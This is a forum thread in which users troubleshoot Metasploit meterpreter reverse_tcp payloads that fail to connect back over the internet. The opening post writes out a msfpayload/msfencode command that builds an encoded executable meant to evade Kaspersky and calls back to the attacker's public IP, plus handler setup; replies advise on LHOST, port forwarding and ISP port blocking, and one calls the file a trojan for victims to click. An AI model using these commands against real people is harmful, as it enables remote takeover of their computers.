Results 1 to 9 of 9

Thread: MetaSploit - Some problems

Hybrid View

  1. #1
    Just burned his ISO 0megear's Avatar
    Join Date
    Jul 2009
    Posts
    8

    Red face MetaSploit - Some problems

    Hello folks.

    I'am try to create a test situation where i sploit someone via the internet. To do so, i have 2 computers (1 victim and 1 attacker) all based on two different connection and i generate a simple meterpreter.exe + handler on my backtrackbox and the windows victim will stupidly double click on my .exe

    It's really just for trying purpose and it even doesn't work.

    So this is what i do :


    1. On my Backtrackbox ( 192.168.1.2 // 85.23.145.28 ) I generate the meterpreter and encode-it to bypass Kaspersky
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=85.23.145.28 LPORT=8080 R | ./msfencode -e php/base64 -c 6 -t raw | ./msfencode -e x86/shitaka_ga_nai -c 20 -t exe > /root/binaries/final.exe
    2. Then still on my backtrackbox, I'am opening the handler to recept the reverse from the victim when he will doubleclick it
    Code:
    msf> use exploit/multi/handler
    msf> set PAYLOAD windows/meterpreter/reverse_tcp
    msf> set LHOST 85.23.145.28
    msf> set LPORT 8080
    msf> exploit
    
    [-] Handler failed to bind to 85.23.145.28:8080 // I guess this isn't really an issue since it just "listen" to the victim connexion, so the local IP should be fine.. right ?
    [*] Started reverse handler on 0.0.0.0:8080
    [*] Starting the payload handler...

    3.Everything seems ok to me so far. Now i'm going to get the .exe and run it to my box

    And it's here that everything seems to fail. I don't know why. I tryied without antivirus, my NAT are correct, my port-forwarding is setup and ready to forward...

    I just double click on the exe, a window pop 1 sec and then nothing. The handler doesn't move and the meterpreter doesn't seems to work.

    The windows box (victim) is a Windows 7 machine.



    Am i missing something ? I did something wrong ?




    Sincerly,

    0megear
    Last edited by 0megear; 07-07-2010 at 07:47 PM.

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: MetaSploit - Some problems

    Try setting your LHOST to your internal IP if you have done the port forwarding.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO 0megear's Avatar
    Join Date
    Jul 2009
    Posts
    8

    Default Re: MetaSploit - Some problems

    I don't know what i'am doing wrong but it is not working.

    My victim computer is a Windows 7 (build 7600, unlicensed) without firewall and antivirus. The meterpreter is double clicked, a cmd.exe show.. and then nothing. No handler when i take a look on my backtrack computer. I tryied without encode and it still doesn't work.

    What is strange about it, is that it seem to have random result. During my test, the meterpreter.exe on the victim was popping 1 sec then disappearing and when i generated the exact same meterpreter 15 min later, the cmd.exe was just here opnened without disappearing.

    I must do something wrong but i double checked everything and i just don't get it.

  4. #4
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    2

    Default Re: MetaSploit - Some problems

    Digging up old topics, I know, but I am posting this just in case someone have encounter the same error and needs help.

    The LHOST should be your backtrack box IP, not the victim IP.
    It should start with 172.x.x.x or 192.168.x.x.x

    After you enter exploit, the victim have to click on the exe file you created to be exploited

    85.23.145.28:8080

    For your understanding, the LHOST (aka Listening Host) should be YOU, or a server you are connected to and is listening for ANY connection from the victim. RHOST (aka Remote Host) will be the victim IP. Therefore in any TROJAN you created, you should always set the LISTENING HOST to YOU, so that any victim clicks on the exe when you are listening victim would allow the trojan to work.

  5. #5
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: MetaSploit - Some problems

    i would look for the stager(payload you generated) exe in windows task manager to see it if is running or just opens then closes. Or perhaps try using netstat in windows to observe outbound tcp/ip connections. To test if the port forwarding is setup correctly for handler, you can browse to 85.23.145.28:8080 from windows box and watch if handler responds in any way

  6. #6
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    4

    Default Riferimento: MetaSploit - Some problems

    hi,
    I have a problem with Metasploit outside lan ..

    in practice:

    1-forward the port 4444 of my router,

    2-disable the firewall on my pc

    3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444

    4-open mfsconsole:
    use exploit / multi / handler
    September PAYLOAD windows / meterpreter / reverse_tcp
    September LHOST (my internal ip)
    LPORT September 4444
    exploit

    5-send the payload, my friend opens it and nothing happens ..

    what's the problem? within the LAN works ..
    hello

  7. #7
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Riferimento: MetaSploit - Some problems

    Quote Originally Posted by erick View Post
    hi,
    I have a problem with Metasploit outside lan ..

    in practice:

    1-forward the port 4444 of my router,

    2-disable the firewall on my pc

    3-create the payload windows / meterpreter / reverse_tcp LHOST with (my ip no-ip), LHPORT = 4444

    4-open mfsconsole:
    use exploit / multi / handler
    September PAYLOAD windows / meterpreter / reverse_tcp
    September LHOST (my internal ip)
    LPORT September 4444
    exploit

    5-send the payload, my friend opens it and nothing happens ..

    what's the problem? within the LAN works ..
    hello
    I might say something stupid but... "september" ? 0.o
    And I assume you mistyped but in your post you wrote "LHPORT"

    Also as iproute said, try changing your lport.

    (@iproute : why blocking this port ?)
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  8. #8
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Riferimento: MetaSploit - Some problems

    Quote Originally Posted by comaX View Post
    I might say something stupid but... "september" ? 0.o
    And I assume you mistyped but in your post you wrote "LHPORT"

    Also as iproute said, try changing your lport.

    (@iproute : why blocking this port ?)
    Not sure. Metasploit was the best answer I could come up with. In our list of blocked ports we have it labeled as microsoft dcom or rpc or some such.


    @erick Oh and windows/meterpreter/reverse_tcp_dns is the more appropriate payload if using no-ip dyndns service
    Last edited by iproute; 03-29-2011 at 11:05 PM.

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: MetaSploit - Some problems

    many ISPs block port 4444. We do(i work for one). Try it on another port

Similar Threads

  1. Metasploit Database Problems
    By xtjacob in forum Beginners Forum
    Replies: 2
    Last Post: 06-08-2010, 11:50 AM
  2. Metasploit Oracle Login_brute problems - Windows
    By metasploit_newbie in forum OLD Pentesting
    Replies: 0
    Last Post: 03-29-2010, 12:33 PM
  3. metasploit o non metasploit, questo Ŕ il problema!
    By eqweo in forum Discussioni Generali
    Replies: 2
    Last Post: 01-14-2010, 12:16 AM
  4. newbie Problems with Metasploit
    By GinoCazino in forum OLD General IT Discussion
    Replies: 2
    Last Post: 06-03-2008, 04:02 PM
  5. A couple of metasploit problems. Help me fix this?
    By Fishbones in forum OLD General IT Discussion
    Replies: 7
    Last Post: 01-22-2008, 09:29 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •